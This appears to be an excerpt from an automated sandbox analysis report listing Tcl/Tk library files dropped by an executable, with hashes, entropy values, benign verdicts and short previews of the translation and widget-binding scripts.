                                                                                                                                                                                                                              SHA1:2BC63982C14BBA8A4C451CE31540181F40CE2216
                                                                                                                                                                                                                              SHA-256:806930F283FD097195C7850E3486B3815D1564529B4F8E5FA6D26F3175183BC1
                                                                                                                                                                                                                              SHA-512:8120E2FFD14E0A992E254796ADDC0DC995C921BE31688C0995D7A36FE82609D78791FEF73EAF5B14E2F0D40AD256AB8DAAA07C18E6950362B28E40B71E47C0B6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset it "&Abort" "&Interrompi".. ::msgcat::mcset it "&About..." "Informazioni...".. ::msgcat::mcset it "All Files" "Tutti i file".. ::msgcat::mcset it "Application Error" "Errore dell' applicazione".. ::msgcat::mcset it "&Blue" "&Blu".. ::msgcat::mcset it "Cancel" "Annulla".. ::msgcat::mcset it "&Cancel" "&Annulla".. ::msgcat::mcset it "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossibile accedere alla directory \"%1\$s\".\nPermesso negato.".. ::msgcat::mcset it "Choose Directory" "Scegli una directory".. ::msgcat::mcset it "Cl&ear" "Azzera".. ::msgcat::mcset it "&Clear Console" "Azzera Console".. ::msgcat::mcset it "Color" "Colore".. ::msgcat::mcset it "Console".. ::msgcat::mcset it "&Copy" "Copia".. ::msgcat::mcset it "Cu&t" "Taglia".. ::msgcat::mcset it "Delete" "Cancella".. ::msgcat::mcset it "Details >>" "Dettagli >>".. ::msgcat::mcset it "Directory \"%1\$s\" does not ex
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4557
                                                                                                                                                                                                                              Entropy (8bit):4.524344068436489
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nucQswBju0x0M4U2z9KSSOzZL5KhWTqGGIrlxXvhYbL/ZO5NT+T4kiLzzdDf1SDM:nLGa0x0Mp2KSHKSv2bL/ZO5u6nRfAXU9
                                                                                                                                                                                                                              MD5:E56229BAC5A8ABB90C4DD8EE3F9FF9F8
                                                                                                                                                                                                                              SHA1:7527D6C3C6C84BFF0E683FFA86A21C58458EB55D
                                                                                                                                                                                                                              SHA-256:0914FBA42361227D14FA281E8A9CBF57C16200B4DA1E61CC3402EF0113A512C7
                                                                                                                                                                                                                              SHA-512:13649DDB06DB4BA9E39BEAF828211086A519444DA9AB5CBDD1B88B29208388189A5141F75AD94B56A348EDDE534FFADE8B19B557CB988EA4ECC9A84B135D36C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset nl "&Abort" "&Afbreken".. ::msgcat::mcset nl "&About..." "Over...".. ::msgcat::mcset nl "All Files" "Alle Bestanden".. ::msgcat::mcset nl "Application Error" "Toepassingsfout".. ::msgcat::mcset nl "&Apply" "Toepassen".. ::msgcat::mcset nl "Bold" "Vet".. ::msgcat::mcset nl "Bold Italic" "Vet Cursief".. ::msgcat::mcset nl "&Blue" "&Blauw".. ::msgcat::mcset nl "Cancel" "Annuleren".. ::msgcat::mcset nl "&Cancel" "&Annuleren".. ::msgcat::mcset nl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan niet naar map \"%1\$s\" gaan.\nU heeft hiervoor geen toestemming.".. ::msgcat::mcset nl "Choose Directory" "Kies map".. ::msgcat::mcset nl "Cl&ear" "Wissen".. ::msgcat::mcset nl "&Clear Console" "&Wis Console".. ::msgcat::mcset nl "Color" "Kleur".. ::msgcat::mcset nl "Console".. ::msgcat::mcset nl "&Copy" "Kopi\u00ebren".. ::msgcat::mcset nl "Cu&t" "Knippen".. ::msgcat::mcset nl "&Dele
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4932
                                                                                                                                                                                                                              Entropy (8bit):4.799369674927008
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nXra9E310fwNCeVsvSmy6MZv8lWBTDGdZ3tojTyrEQmAUCIx4wBxZ:n7a9Q0fyw5MQWgP3uoZChB3
                                                                                                                                                                                                                              MD5:8CFA2E38822303FDCB55AE3277F0B81B
                                                                                                                                                                                                                              SHA1:447F28A5064FCEA019C60B3F9B6D50CD43C2D0E3
                                                                                                                                                                                                                              SHA-256:EACEB1F08DE0863CCF726881E07FE5B135EA09646C5253E0CBF7DDB987EB0D92
                                                                                                                                                                                                                              SHA-512:E38BA9059AFF55C2B22A4AE24D6A76149C76DBA8BF8646AE81D6E07D7ED490D0605034B29D9AC848E6685C8EC26A3DBE5B2EAF462B14D96376E80076FBE7082A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset pl "&Abort" "&Przerwij".. ::msgcat::mcset pl "&About..." "O programie...".. ::msgcat::mcset pl "All Files" "Wszystkie pliki".. ::msgcat::mcset pl "Application Error" "B\u0142\u0105d w programie".. ::msgcat::mcset pl "&Apply" "Zastosuj".. ::msgcat::mcset pl "Bold" "Pogrubienie".. ::msgcat::mcset pl "Bold Italic" "Pogrubiona kursywa".. ::msgcat::mcset pl "&Blue" "&Niebieski".. ::msgcat::mcset pl "Cancel" "Anuluj".. ::msgcat::mcset pl "&Cancel" "&Anuluj".. ::msgcat::mcset pl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Nie mo\u017cna otworzy\u0107 katalogu \"%1\$s\".\nOdmowa dost\u0119pu.".. ::msgcat::mcset pl "Choose Directory" "Wybierz katalog".. ::msgcat::mcset pl "Cl&ear" "&Wyczy\u015b\u0107".. ::msgcat::mcset pl "&Clear Console" "&Wyczy\u015b\u0107 konsol\u0119".. ::msgcat::mcset pl "Color" "Kolor".. ::msgcat::mcset pl "Console" "Konsola".. ::msgcat::mcset pl "&Copy" "&Kopiu
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3987
                                                                                                                                                                                                                              Entropy (8bit):4.63232183429232
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nHOT1mM5qHHxiBHb3joTjtcp2UqMxweo6VvilCMKKXx9vjM:nHOT1mMQnwB/otcUUpGX6VPVoLjM
                                                                                                                                                                                                                              MD5:4018686F2A8E299D86BDB1478BC97896
                                                                                                                                                                                                                              SHA1:0EECE3D57F2EA5EECE8157B06F3AFB97E1F2551A
                                                                                                                                                                                                                              SHA-256:D687F71F0432BB0D02EFDF576E526D2C19D4136F76C41A3224A2F034168F3F34
                                                                                                                                                                                                                              SHA-512:4D730068B2A21E1D6004205B10A9D0D5EE9683FEB03B6FB673E8B9B94ED6BE468086A52DFE97C4DBF35A07CBB2C5E276DF0952A06C78E029D53D796CB6FCC8DF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset pt "&Abort" "&Abortar".. ::msgcat::mcset pt "About..." "Sobre ...".. ::msgcat::mcset pt "All Files" "Todos os arquivos".. ::msgcat::mcset pt "Application Error" "Erro de aplica\u00e7\u00e3o".. ::msgcat::mcset pt "&Blue" "&Azul".. ::msgcat::mcset pt "Cancel" "Cancelar".. ::msgcat::mcset pt "&Cancel" "&Cancelar".. ::msgcat::mcset pt "Cannot change to the directory \"%1\$s\".\nPermission denied." "N\u00e3o foi poss\u00edvel mudar para o diret\u00f3rio \"%1\$s\".\nPermiss\u00e3o negada.".. ::msgcat::mcset pt "Choose Directory" "Escolha um diret\u00f3rio".. ::msgcat::mcset pt "Cl&ear" "Apagar".. ::msgcat::mcset pt "&Clear Console" "Apagar Console".. ::msgcat::mcset pt "Color" "Cor".. ::msgcat::mcset pt "Console".. ::msgcat::mcset pt "&Copy" "Copiar".. ::msgcat::mcset pt "Cu&t" "Recortar".. ::msgcat::mcset pt "&Delete" "Excluir".. ::msgcat::mcset pt "Details >>" "Detalhes >>".. ::msgcat::mcset pt "D
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8620
                                                                                                                                                                                                                              Entropy (8bit):4.477728981060218
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:n9MEBGkFKT4YHCDhxqEMk0yOC2xXLtSRoxwKl9zFAWx2yuV9cDcwRjnWNQuNFNfO:T0rm8IONoRkN1w+jRQ/FoxrRHRJP
                                                                                                                                                                                                                              MD5:C69A904A57FDC95520086E9DDFED362C
                                                                                                                                                                                                                              SHA1:F0220602ABE91FE563E5AA6A4EA4AB43818C0CFC
                                                                                                                                                                                                                              SHA-256:F0D310A2EE9C0AF928D822CBB39BCBE54FB2C1C95EE8167DFFD55EDC1B2FE040
                                                                                                                                                                                                                              SHA-512:808B82F29B7BA06AF5AE44C6C23EC8DD743E93B391F060C7586D6D3FF26C97294BD11AD215848EBA422491BD50C4509330DD24C83134C7A384E81304133CAADB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset ru "&Abort" "&\u041e\u0442\u043c\u0435\u043d\u0438\u0442\u044c".. ::msgcat::mcset ru "&About..." "\u041f\u0440\u043e...".. ::msgcat::mcset ru "All Files" "\u0412\u0441\u0435 \u0444\u0430\u0439\u043b\u044b".. ::msgcat::mcset ru "Application Error" "\u041e\u0448\u0438\u0431\u043a\u0430 \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435".. ::msgcat::mcset ru "&Apply" "&\u041f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c".. ::msgcat::mcset ru "Bold" "Bold".. ::msgcat::mcset ru "Bold Italic" "Bold Italic".. ::msgcat::mcset ru "&Blue" " &\u0413\u043e\u043b\u0443\u0431\u043e\u0439".. ::msgcat::mcset ru "Cancel" "\u041e\u0442\u043c\u0435\u043d\u0430".. ::msgcat::mcset ru "&Cancel" "\u041e\u0442&\u043c\u0435\u043d\u0430".. ::msgcat::mcset ru "Cannot change to the directory \"%1\$s\".\nPermission denied." \....."\u041d\u0435 \u043c\u043e\u0433\u0443 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u0432 \u043a\u043
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3908
                                                                                                                                                                                                                              Entropy (8bit):4.658068191079967
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nT8A5cbwKmtI1sE9xt6BDyepTr2iiK/yGqXZlBp9:nD5cb2extDepTCnVpJ9
                                                                                                                                                                                                                              MD5:1D085A672A6FCDECEF5D7D876E4C74A3
                                                                                                                                                                                                                              SHA1:1A40C03F15A6926359CA3E5C0A809485CAD28AEE
                                                                                                                                                                                                                              SHA-256:A6821A13D34FB31F1827294B82C4BF9586BB255CA14F78C3ACE11181F42EF211
                                                                                                                                                                                                                              SHA-512:981EDEEF5E4C915BB8F10044096B412D1855CAD08F98A448C6C0A49A54222945EBD102DDCB9525535E0FB19313C319155FA59384605B2C36CC8B4A58693D57E7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset sv "&Abort" "&Avsluta".. ::msgcat::mcset sv "&About..." "&Om...".. ::msgcat::mcset sv "All Files" "Samtliga filer".. ::msgcat::mcset sv "Application Error" "Programfel".. ::msgcat::mcset sv "&Blue" "&Bl\u00e5".. ::msgcat::mcset sv "Cancel" "Avbryt".. ::msgcat::mcset sv "&Cancel" "&Avbryt".. ::msgcat::mcset sv "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ej n\u00e5 mappen \"%1\$s\".\nSaknar r\u00e4ttigheter.".. ::msgcat::mcset sv "Choose Directory" "V\u00e4lj mapp".. ::msgcat::mcset sv "Cl&ear" "&Radera".. ::msgcat::mcset sv "&Clear Console" "&Radera konsollen".. ::msgcat::mcset sv "Color" "F\u00e4rg".. ::msgcat::mcset sv "Console" "Konsoll".. ::msgcat::mcset sv "&Copy" "&Kopiera".. ::msgcat::mcset sv "Cu&t" "Klipp u&t".. ::msgcat::mcset sv "&Delete" "&Radera".. ::msgcat::mcset sv "Details >>" "Detaljer >>".. ::msgcat::mcset sv "Directory \"%1\$s\" does not exist." "Mapp
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4951
                                                                                                                                                                                                                              Entropy (8bit):5.319678095131993
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nnIoT3wHqLHQslojYhOvZSVGNUpi6Zz0qBAE9A+uiTrBsyqCgnPLz:nnIoT3wHU/osIAwNILt0HE2oV6CgPLz
                                                                                                                                                                                                                              MD5:1435107EB17A09E4AD7277FFA1C76913
                                                                                                                                                                                                                              SHA1:9990C26829275F16C6FC494D32C4298EC541E7D3
                                                                                                                                                                                                                              SHA-256:B6802B7B080A2D8BC3D81614EC55A609CB5EF673C7A81E93E07925D6710F90DD
                                                                                                                                                                                                                              SHA-512:4B2CAE4FA135411761D5B7CBFFABCE87D745A9B6496C7FD7C4AF10E76EE36E51CA62A1417CF6C27070EFF9539A305BE45C010AE4F8532C8C2D915FA101F5157E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset zh_cn "&Abort" "&..".. ::msgcat::mcset zh_cn "&About..." "&....".. ::msgcat::mcset zh_cn "All Files" "....".. ::msgcat::mcset zh_cn "Application Error" "......".. ::msgcat::mcset zh_cn "&Apply" "&..".. ::msgcat::mcset zh_cn "Bold" "..".. ::msgcat::mcset zh_cn "Bold Italic" "....".. ::msgcat::mcset zh_cn "&Blue" "&..".. ::msgcat::mcset zh_cn "Cancel" "..".. ::msgcat::mcset zh_cn "&Cancel" "&..".. ::msgcat::mcset zh_cn "Cannot change to the directory \"%1\$s\".\nPermission denied." "...... \"%1\$s\".\n......".. ::msgcat::mcset zh_cn "Choose Directory" ".....".. ::msgcat::mcset zh_cn "Cl&ear" ".&.".. ::msgcat::mcset zh_cn "&Clear Console" "&....".. ::msgcat::mcset zh_cn "Color" "..".. ::msgcat::mcset zh_cn "Console" "..".. ::msgcat::mcset zh_cn "&Copy" "&..".. ::msgcat::mcset zh
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5772
                                                                                                                                                                                                                              Entropy (8bit):5.038729016734604
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:onzxtm7EMgdMjwPqeuAmz9LD1kFIQETZqoIK/RLf7w:ozxtm7qUwi79l0sZqoBJLDw
                                                                                                                                                                                                                              MD5:FC9E03823BEB08DAF7681C09D106DF7D
                                                                                                                                                                                                                              SHA1:7D06FC8F98140E0FFAA2571BD522FC772E58DE54
                                                                                                                                                                                                                              SHA-256:540EEECBA17207A56290BAFFDAE882BBD4F88364791204AD5D14C7BEDD022CCC
                                                                                                                                                                                                                              SHA-512:2B5BAD311A703A0FE2ED67ACE311BAD4C767BCD23DFC3D9ABDF5C3604146A6A15D6BD13A14BDEFCDB2B602C708AACFAB404E96FCBA7C546AD0DAECD4BE2EB34A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# obsolete.tcl --..#..# This file contains obsolete procedures that people really shouldn't..# be using anymore, but which are kept around for backward compatibility...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# The procedures below are here strictly for backward compatibility with..# Tk version 3.6 and earlier. The procedures are no longer needed, so..# they are no-ops. You should not use these procedures anymore, since..# they may be removed in some future release.....proc tk_menuBar args {}..proc tk_bindForTraversal args {}....# ::tk::classic::restore --..#..# Restore the pre-8.5 (Tk classic) look as the widget defaults for classic..# Tk widgets...#..# The value following an 'option add' call is the new 8.5 value...#..namespace eval ::tk::classic {.. # This may need t
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1629
                                                                                                                                                                                                                              Entropy (8bit):4.784780799273752
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:g2hBuOrlkBytcqYXRE5fvvXq1EhJPqOj6Wf0cVlN:gQ6q4E5HCqhBqOhcaD
                                                                                                                                                                                                                              MD5:9B7A8FD2C6B538FF31BDC380452C6DE3
                                                                                                                                                                                                                              SHA1:3F915BFE85CED9F6C7E9A352718770E9F14F098E
                                                                                                                                                                                                                              SHA-256:40CA505C9784B0767D4854485C5C311829594A4FCBDFD7251E60E6BB7EA74FD1
                                                                                                                                                                                                                              SHA-512:43937152B844BE1E597E99DA1270E54AB1D572AE89CB759E6D41C18C9C8044CCC15A6925F9C5AF617AE9EC1404E78C2733231F4D5C6CFE4D23C546387B1FC328
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# optMenu.tcl --..#..# This file defines the procedure tk_optionMenu, which creates..# an option button and its associated menu...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk_optionMenu --..# This procedure creates an option button named $w and an associated..# menu. Together they provide the functionality of Motif option menus:..# they can be used to select one of many values, and the current value..# appears in the global variable varName, as well as in the text of..# the option menubutton. The name of the menu is returned as the..# procedure's result, so that the caller can use it to change configuration..# options on the menu or otherwise manipulate it...#..# Arguments:..# w -...The name to use for the menubutton...# varName -..Global variable to hold the currently
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8418
                                                                                                                                                                                                                              Entropy (8bit):4.964814946573677
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:HWh/x+hFMyTA/CTzxFoUuliRLDm8pQrQlENPyF3o48M6C:HWL+MyTA/CTzvAiRqyEw3ok
                                                                                                                                                                                                                              MD5:4CE08A10CD9AE941654B8C679DF669F3
                                                                                                                                                                                                                              SHA1:F1288BABCA698FD18C3BD221E6AE6C02F2975AAE
                                                                                                                                                                                                                              SHA-256:849B4C57E4644E51BEAEAEB3AE59B7FF067E582ECD10F1B2CAF6B6E72F11F506
                                                                                                                                                                                                                              SHA-512:0F37539DA3540E9B1DA7B0377E3BBB359B71DB4271D63BC9501E95931B4E609E8CB91DC2F7B08A6452598D4A0D58C6A2034049A215000EEF0F93A9963D003632
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# palette.tcl --..#..# This file contains procedures that change the color palette used..# by Tk...#..# Copyright (c) 1995-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk_setPalette --..# Changes the default color scheme for a Tk application by setting..# default colors in the option database and by modifying all of the..# color options for existing widgets that have the default value...#..# Arguments:..# The arguments consist of either a single color name, which..# will be used as the new background color (all other colors will..# be computed from this) or an even number of values consisting of..# option names and values. The name for an option is the one used..# for the option database, such as activeForeground, not -activeforeground.....proc ::tk_setPalette {args} {.. if {[winfo depth .] == 1} {...# Just return on monochrome displays, otherwise errors
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5370
                                                                                                                                                                                                                              Entropy (8bit):4.979530133775421
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ssAXzkTQ9w5fLQYkJLZkRXKUXfwyZTq2sz8j2Em3YKhrYK:jAXgE0DQpJLGR6UXfpqnzG3m3YKhrYK
                                                                                                                                                                                                                              MD5:286C01A1B12261BC47F5659FD1627ABD
                                                                                                                                                                                                                              SHA1:4CA36795CAB6DFE0BBBA30BB88A2AB71A0896642
                                                                                                                                                                                                                              SHA-256:AA4F87E41AC8297F51150F2A9F787607690D01793456B93F0939C54D394731F9
                                                                                                                                                                                                                              SHA-512:D54D5A89B7408A9724A1CA1387F6473BDAD33885194B2EC5A524C7853A297FD65CE2A57F571C51DB718F6A00DCE845DE8CF5F51698F926E54ED72CDC81BCFE54
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# panedwindow.tcl --..#..# This file defines the default bindings for Tk panedwindow widgets and..# provides procedures that help in implementing those bindings.....bind Panedwindow <Button-1> { ::tk::panedwindow::MarkSash %W %x %y 1 }..bind Panedwindow <Button-2> { ::tk::panedwindow::MarkSash %W %x %y 0 }....bind Panedwindow <B1-Motion> { ::tk::panedwindow::DragSash %W %x %y 1 }..bind Panedwindow <B2-Motion> { ::tk::panedwindow::DragSash %W %x %y 0 }....bind Panedwindow <ButtonRelease-1> {::tk::panedwindow::ReleaseSash %W 1}..bind Panedwindow <ButtonRelease-2> {::tk::panedwindow::ReleaseSash %W 0}....bind Panedwindow <Motion> { ::tk::panedwindow::Motion %W %x %y }....bind Panedwindow <Leave> { ::tk::panedwindow::Leave %W }....# Initialize namespace..namespace eval ::tk::panedwindow {}....# ::tk::panedwindow::MarkSash --..#..# Handle marking the correct sash for possible dragging..#..# Arguments:..# w..the widget..# x..widget local x coord..# y..widget local y coord..# proxy.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):376
                                                                                                                                                                                                                              Entropy (8bit):5.040809246948068
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:CsUgabAOgjDnzJNBc6ynID/cL4RpncleXN17MQ9PCSIBIQ08hof7MQ9PCSIBIQei:lGbyntNO6LYZliCNBIUhkCNBIFi
                                                                                                                                                                                                                              MD5:8A0517A7A4C70111080ED934329E2BC5
                                                                                                                                                                                                                              SHA1:5B465E0D3500A8F04EE1C705662032F44E2ED0D2
                                                                                                                                                                                                                              SHA-256:A5D208887A94832328C3A33928A80F3B46AA205C20DB4F050A47D940E94071B4
                                                                                                                                                                                                                              SHA-512:D9F502A006A5E0514FD61426818AD1F4168E449588F9D383D6B0BF87A18BE82C420863A9A28E1BEB441284A0B1BC2A0B3D3276A0FE3196341AEC15A27920DE5D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:if {![package vsatisfies [package provide Tcl] 8.6.0]} return..if {($::tcl_platform(platform) eq "unix") && ([info exists ::env(DISPLAY)]...|| ([info exists ::argv] && ("-display" in $::argv)))} {.. package ifneeded Tk 8.6.13 [list load [file join $dir .. .. bin libtk8.6.dll]]..} else {.. package ifneeded Tk 8.6.13 [list load [file join $dir .. .. bin tk86t.dll]]..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7632
                                                                                                                                                                                                                              Entropy (8bit):4.891666209090638
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Eet0t8bm9Z+Yjo+j/YKOtOUOtk8XKUal320:EetG8biZZs+bIAUoxX0d
                                                                                                                                                                                                                              MD5:21A3AC11146EC26784C0E729D8D644D0
                                                                                                                                                                                                                              SHA1:C7E0918E8692C42C1D1DD1BBCBFFF22A85979B69
                                                                                                                                                                                                                              SHA-256:579701605669AADFFBCDB7E3545C68442495428EE6E93C2D3A3133583BCD3D33
                                                                                                                                                                                                                              SHA-512:724ED83B989AD9033BEC4211EE50E4C9E85B51054C518CDF7E02D0ED0416F636B9F38C0B0D29F8F4F7F465B77C7D2E01D0918D2C2C3FEC4C7739EA982302FA2E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# safetk.tcl --..#..# Support procs to use Tk in safe interpreters...#..# Copyright (c) 1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# see safetk.n for documentation....#..#..# Note: It is now ok to let untrusted code being executed..# between the creation of the interp and the actual loading..# of Tk in that interp because the C side Tk_Init will..# now look up the parent interp and ask its safe::TkInit..# for the actual parameters to use for it's initialization (if allowed),..# not relying on the child state...#....# We use opt (optional arguments parsing)..package require opt 0.4.1;....namespace eval ::safe {.... # counter for safe toplevels.. variable tkSafeId 0..}....#..# tkInterpInit : prepare the child interpreter for tk loading..# most of the real job is done by loadTk..# returns the child name (tkInterpInit
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8693
                                                                                                                                                                                                                              Entropy (8bit):4.968450834020619
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:GSusE8YOdpO4aDtao+QYa6t2jooB6ajpaqa5xQGmLGKOC9dLrVx:KsbYQO48t+QYa+NkFjpagGmKKX9dLrVx
                                                                                                                                                                                                                              MD5:D45202D3D2D052D4C6BFE8D1322AAB39
                                                                                                                                                                                                                              SHA1:8CDF184AC2E9299B2B2A107A64E9D1803AA298DE
                                                                                                                                                                                                                              SHA-256:0747A387FDD1B2C7135ECEAE7B392ED52E1D1EBF3FFA90FEBE886DBC0981EB74
                                                                                                                                                                                                                              SHA-512:27B005F955BAE00D15C4492E7BD3EBDC5EE3BF9C164C418198B4BD185709C8810AA6CF76CBCC07EEB4C1D20F8C76EF8DF8B219563C18B88C94954C910BFF575D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# scale.tcl --..#..# This file defines the default bindings for Tk scale widgets and provides..# procedures that help in implementing the bindings...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1995 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# The code below creates the default class bindings for entries...#-------------------------------------------------------------------------....# Standard Motif bindings:....bind Scale <Enter> {.. if {$tk_strictMotif} {...set tk::Priv(activeBg) [%W cget -activebackground]...%W configure -activebackground [%W cget -background].. }.. tk::ScaleActivate %W %x %y..}..bind Scale <Motion> {.. tk::ScaleActivate %W %x %y..}..bind Scale <Leave> {.. if {$tk_strictMotif} {...%W configure -activebackground
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13188
                                                                                                                                                                                                                              Entropy (8bit):5.063842571848725
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Gf7RV8ei32PHKT8H2wwucyRlXn+kl1nBKp4nu5FCyK:2mei3qHKT8WPurnXn+I1nBg4nu5MyK
                                                                                                                                                                                                                              MD5:5249CD1E97E48E3D6DEC15E70B9D7792
